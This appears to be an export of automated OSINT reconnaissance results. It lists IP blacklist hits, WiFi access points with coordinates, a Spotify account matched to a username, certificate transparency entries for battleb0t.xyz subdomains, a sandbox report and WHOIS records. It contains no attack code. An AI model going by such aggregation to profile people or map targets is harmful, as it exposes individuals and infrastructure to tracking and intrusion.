| 2023-05-12 03:19:24 | Blacklisted IP Address | Yes | UCEPROTECT | 0 | 1 | 3 | 0 | None | UCEPROTECT - Level 2 (some false positives) (104.196.30.220) | 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:39:9C:6E) | 50.1188, 8.6843 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/ayshoo | ayshoo |
| 2023-05-12 02:44:13 | Raw Data from RIRs | No | Certificate Transparency | 16 | 0 | 1 | 0 | None | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: | battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.20): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PartyVan (Net ID: 00:00:C0:16:5F:81) | 34.0544, -118.244 |
| 2023-05-12 02:46:05 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://scrolltop-relativeoffset.top', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.opentext.com/customer-stories/customer-story-detail?id=1562', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3fc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_3fc_IESQMMUTEX_0_519"\n "IsoScope_3fc_IE_EarlyTabStart_0xc64_Mutex"\n "IsoScope_3fc_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_3fc_ConnHashTable<1020>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1020"\n "UpdatingNewTabPageData"\n "IsoScope_3fc_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1020"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.66.40.92:443"\n "185.199.111.153:443"\n "23.39.0.132:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"67-218-111-202_s-104-123-154-43_ts-1680654284-clienttons-s.akamaihd.net"\n "assets.ot.digital"\n "ipng7stimpxeczbmx7ga-p09kpl-1ec73a34f-clientnsv4-s.akamaihd.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""sameAs": ["https://twitter.com/OpenText","https://www.youtube.com/user/opentextcorp","https://www.linkedin.com/company/opentext"]" (Indicator: "linkedin.com")\n "ls:begin[meta-twitter]-->" (Indicator: "twitter")\n "<meta name="twitter:url" content="https://www.opentext.com/customers/switch">" (Indicator: "twitter")\n "<meta name="twitter:title" content="Switch | OpenText">" (Indicator: "twitter")\n "ls:end[meta-twitter]-->" (Indicator: "twitter")\n "<meta property="twitter:image" content="/assets/images/OT_ShareImage_twitter.png">" (Indicator: "twitter")\n "<li class="list-inline-item"><a class="social-icon social-icon-linkedin" href="https://www.linkedin.com/company/opentext"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "linkedin.com")\n "<li class="list-inline-item"><a class="social-icon social-icon-twitter" href="https://twitter.com/OpenText"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "twitter")\n "<li class="list-inline-item"><a class="social-icon social-icon-youtube" href="https://www.youtube.com/user/opentextcorp"><svg width="32" height="32" viewBox="0 0 36 36" fill="none" role="img" aria-hidden="true" focusable="false">" (Indicator: "youtube")\n "<path fill="currentColor" fill-rule="evenodd" clip-rule="evenodd" d="M27.8 14.1C27.8 14.1 27.604 12.692 27.005 12.072C26.319 11.339 25.559 11.263 25.13 11.221L25 11.207C22.203 11 18.005 11 18.005 11H17.995C17.995 11 13.797 11 10.999 11.207L10.872 11.22C10.442 11.263 9.682 11.338 8.995 12.072C8.395 12.692 8.2 14.101 8.2 14.101C8.2 14.101 8 15.755 8 17.409V18.959C8 20.613 8.2 22.267 8.2 22.267C8.2 22.267 8.395 23.675 8.995 24.295C9.627 24.971 10.421 25.069 10.929 25.131H10.93C11.034 25.144 11.124 25.155 11.2 25.169C12.8 25.326 18 25.375 18 25.375C18 25.375 22.203 25.369 25.001 25.162L25.131 25.148C25.56 25.105 26.32 25.029 27.005 24.295C27.605 23.675 27.8 22.267 27.8 22.267C27.8 22.267 28 20.613 28 18.959V17.409C28 15.755 27.8 14.101 27.8 14.101V14.1ZM15.934 15.096L15.935 20.838L21.338 17.978L15.934 15.096V15.096Z"></path></svg><span class="sr-only">OpenText on Youtube</span></a></li>" (Indicator: "youtube")\n "* Copyright 2011-2021 Twitter, Inc." (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD24E.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCFC2.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD260.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD407.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCFD4.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCF72.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD152.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCF71.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCFD5.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD0B4.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD065.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCFC3.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003316]\n "CabD406.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabD406.tmp]- [targetUID: 00000000-00003316]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"opentext-protection-lock-network-ico-72_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "HowCanWeHelp-About-OT_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "opentext-resources-blog-ico-primary-72_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "opentext-document-dollarsign-download-ico-72_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "big-o-v_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "HowCanWeHelp-Contact-Us_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "opentext-performance-diagram-fast-up-ico-72_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "opentext.min_1_.css" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "opentext.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "ZHN4T-KPGPJ-F8GJF-7KJFE-XJT75_1_.js" has type "C source ASCII text with very long lines"- [targetUID: N/A]\n "TarD24E.tmp" has type "data"- Location: [%TEMP%\\TarD24E.tmp]- [targetUID: 00000000-00003316]\n "Inter-SemiBoldItalic_1_.woff" has type "Web Open Font Format TrueType length 151180 version 0.0"- [targetUID: N/A]\n "Inter-BoldItalic_1_.woff" has type "Web Open Font Format TrueType length 151052 version 0.0"- [targetUID: N/A]\n "Inter-MediumItalic_1_.woff" has type "Web Open Font Format TrueType length 150988 version 0.0"- [targetUID: N/A]\n "Inter-ExtraBoldItalic_1_.woff" has type "Web Open Font Format TrueType length 150628 version 0.0"- [targetUID: N/A]\n "Inter-LightItalic_1_.woff" has type "Web Open Font Format TrueType length 150092 version 0.0"- [targetUID: N/A]\n "Inter-ExtraLightItalic_1_.woff" has type "Web Open Font Format TrueType length 149996 version 0.0"- [targetUID: N/A]\n "Inter-BlackItalic_1_.woff" has type "Web Open Font Format TrueType length 146824 version 0.0"- [targetUID: N/A]\n "Inter-ThinItalic_1_.woff" has type "Web Open Font Format TrueType length 145480 version 0.0"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': | 185.199.111.153 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-oo.github.io |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | United States | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomF2385E (Net ID: 00:0C:F6:F2:38:5E) | 50.8897, 6.0563 |
